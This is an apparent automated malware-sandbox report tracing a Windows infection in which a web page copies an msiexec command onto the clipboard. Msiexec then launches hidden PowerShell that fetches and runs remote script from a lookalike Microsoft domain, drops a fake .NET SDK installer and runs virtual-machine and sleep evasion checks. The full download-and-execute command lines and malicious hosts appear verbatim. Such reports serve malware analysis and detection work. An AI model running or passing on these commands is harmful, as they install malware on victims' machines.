Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\system32\systeminfo.exe"
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\System32\msiexec.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A737E874-2CD8-4738-B38F-9986E7D8C9C9} Jump to behavior
Source: Binary string: D:\a\_work\1\s\build\ship\x86\burn.pdb source: dotnet-sdk-8.0.408-win-x64.exe.20.dr
Source: Binary string: D:\a\_work\1\s\build\ship\x86\burn.pdb/ source: dotnet-sdk-8.0.408-win-x64.exe.20.dr

Data Obfuscation
barindex
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$s='irm events-data-microsoft.live/h8xiyPNTne';iex ([string]::Join('|', $s, 'iex'))"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$s='irm events-data-microsoft.live/h8xiyPNTne';iex ([string]::Join('|', $s, 'iex'))" Jump to behavior

Persistence and Installation Behavior
barindex
HTML page adds supicious text to clipboard
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Clipboard modification: msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Drops PE files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\dotnet-sdk-8.0.408-win-x64.exe Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\systeminfo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3920
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5760
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 1059
Found dropped PE file which has not been started or loaded
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dotnet-sdk-8.0.408-win-x64.exe Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\msiexec.exe TID: 1764 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3324 Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6948 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
